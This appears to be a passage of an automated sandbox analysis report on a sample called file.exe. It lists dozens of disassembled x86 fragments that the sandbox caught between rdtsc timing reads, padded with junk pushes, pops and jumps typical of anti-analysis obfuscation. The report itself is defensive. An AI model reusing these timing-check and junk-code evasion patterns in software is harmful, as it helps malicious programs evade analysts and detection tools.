                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11752E0 second address: 117536D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F020CB28446h 0x00000009 jno 00007F020CB28446h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F020CB28448h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d push dword ptr fs:[00000000h] 0x00000034 mov edi, dword ptr [ebp+122D38C9h] 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 pushad 0x00000042 or si, 713Fh 0x00000047 mov dword ptr [ebp+122D2327h], edx 0x0000004d popad 0x0000004e mov eax, dword ptr [ebp+122D1205h] 0x00000054 jnc 00007F020CB2844Ah 0x0000005a push FFFFFFFFh 0x0000005c push 00000000h 0x0000005e push ebx 0x0000005f call 00007F020CB28448h 0x00000064 pop ebx 0x00000065 mov dword ptr [esp+04h], ebx 0x00000069 add dword ptr [esp+04h], 00000019h 0x00000071 inc ebx 0x00000072 push ebx 0x00000073 ret 0x00000074 pop ebx 0x00000075 ret 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117536D second address: 1175378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F020CB267E6h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1171426 second address: 11714B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F020CB28448h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 jnp 00007F020CB2844Ch 0x00000027 mov dword ptr [ebp+1247D13Ah], esi 0x0000002d mov ebx, 43284A68h 0x00000032 push dword ptr fs:[00000000h] 0x00000039 call 00007F020CB28455h 0x0000003e mov edi, edx 0x00000040 pop ebx 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 mov di, ABE1h 0x0000004c mov eax, dword ptr [ebp+122D0DE1h] 0x00000052 mov ebx, dword ptr [ebp+122D2E88h] 0x00000058 push FFFFFFFFh 0x0000005a clc 0x0000005b jmp 00007F020CB28451h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push ebx 0x00000064 jno 00007F020CB28446h 0x0000006a pop ebx 0x0000006b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11714B0 second address: 11714B5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117613D second address: 117614B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11827E5 second address: 11827EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11827EA second address: 118284C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F020CB28446h 0x00000009 jmp 00007F020CB28452h 0x0000000e jno 00007F020CB28446h 0x00000014 popad 0x00000015 jno 00007F020CB28448h 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 ja 00007F020CB28446h 0x00000026 jmp 00007F020CB28458h 0x0000002b jmp 00007F020CB2844Eh 0x00000030 jno 00007F020CB28446h 0x00000036 popad 0x00000037 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118284C second address: 1182859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F020CB267E6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1182962 second address: 1182968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1182968 second address: 118298A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267EAh 0x00000007 jp 00007F020CB267E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007F020CB267EEh 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118298A second address: 11829A2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F020CB28453h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F020CB2844Bh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1182C2C second address: 1182C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F020CB267F4h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1182C44 second address: 1182C61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28459h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1182C61 second address: 1182C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1182C6A second address: 1182C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1182C70 second address: 1182C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 jng 00007F020CB267E6h 0x0000000f jmp 00007F020CB267EAh 0x00000014 pop edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1182C8A second address: 1182C94 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F020CB2844Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1184739 second address: 1184741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1184741 second address: 1184746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118878E second address: 11887A0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F020CB267E8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11887A0 second address: 11887A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11887A5 second address: 11887AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11887AA second address: 11887B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11887B0 second address: 11887D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F020CB267F0h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11887D2 second address: 11887D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D561 second address: 118D568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DCA9 second address: 118DCAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DE19 second address: 118DE29 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F020CB267EEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DE29 second address: 118DE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jne 00007F020CB2844Ah 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DE3E second address: 118DE5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F020CB267F0h 0x0000000c ja 00007F020CB267E6h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E0FA second address: 118E110 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F020CB28446h 0x00000008 jo 00007F020CB28446h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E110 second address: 118E11C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F020CB267E6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E11C second address: 118E121 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E266 second address: 118E282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F020CB267F6h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E282 second address: 118E294 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F020CB28446h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E294 second address: 118E298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E5C9 second address: 118E5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E5CD second address: 118E5DA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F020CB267E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E73D second address: 118E741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E741 second address: 118E753 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F020CB267E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F020CB267EEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197879 second address: 119787D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119787D second address: 1197892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267F1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197892 second address: 1197898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197898 second address: 119789D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196458 second address: 11964A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F020CB28450h 0x00000013 push eax 0x00000014 jno 00007F020CB28446h 0x0000001a jmp 00007F020CB2844Fh 0x0000001f pop eax 0x00000020 push ebx 0x00000021 jmp 00007F020CB28452h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196A44 second address: 1196A50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F020CB267E6h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196BA9 second address: 1196BC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28454h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196E76 second address: 1196E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196E7C second address: 1196ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F020CB28458h 0x0000000b jmp 00007F020CB2844Bh 0x00000010 popad 0x00000011 jmp 00007F020CB2844Ah 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007F020CB28446h 0x00000021 jmp 00007F020CB28458h 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196ED3 second address: 1196EDD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F020CB267E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196EDD second address: 1196EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197093 second address: 119709B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197225 second address: 1197229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119AB1A second address: 119AB2A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F020CB267F2h 0x00000008 ja 00007F020CB267E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1121EBF second address: 1121EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119E4EB second address: 119E513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007F020CB267F8h 0x0000000d jnc 00007F020CB267E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1112F42 second address: 1112F4C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F020CB28446h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1165F74 second address: 1165F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166120 second address: 1166125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166125 second address: 1166150 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c jmp 00007F020CB267F4h 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166150 second address: 1166154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166154 second address: 1166158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166158 second address: 116619B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F020CB28448h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 push eax 0x00000023 cld 0x00000024 pop edx 0x00000025 mov cx, 1E13h 0x00000029 je 00007F020CB2844Ch 0x0000002f add edi, 00AEF515h 0x00000035 nop 0x00000036 pushad 0x00000037 push esi 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116619B second address: 11661B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F020CB267EFh 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116633A second address: 116633E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166BC3 second address: 1166BC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166BC9 second address: 1166BED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28456h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push esi 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166BED second address: 1166BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166BF9 second address: 1166C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F020CB28451h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F020CB2845Ah 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166D14 second address: 1166D64 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F020CB267E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007F020CB267E6h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 ja 00007F020CB267F4h 0x0000001c nop 0x0000001d jmp 00007F020CB267EDh 0x00000022 lea eax, dword ptr [ebp+1248A6F0h] 0x00000028 and edx, dword ptr [ebp+122D37CDh] 0x0000002e sbb edi, 639EA296h 0x00000034 nop 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push edx 0x00000039 pop edx 0x0000003a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166D64 second address: 1166D7C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F020CB28446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jno 00007F020CB28446h 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A201D second address: 11A2021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2021 second address: 11A2027 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2557 second address: 11A257E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F020CB267F0h 0x00000008 jbe 00007F020CB267E6h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jc 00007F020CB267E6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A257E second address: 11A2584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2584 second address: 11A2589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2589 second address: 11A258E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A270F second address: 11A2713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2713 second address: 11A2719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2719 second address: 11A272F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F020CB267EEh 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A84CF second address: 11A84D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A6FFA second address: 11A7023 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F020CB267F8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e js 00007F020CB267ECh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7023 second address: 11A7041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F020CB28458h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A742A second address: 11A7432 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A75AF second address: 11A75B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A784E second address: 11A7855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7855 second address: 11A7867 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB2844Dh 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A79BF second address: 11A79F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267F2h 0x00000007 jmp 00007F020CB267EBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F020CB267F0h 0x00000013 pop eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A79F6 second address: 11A79FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
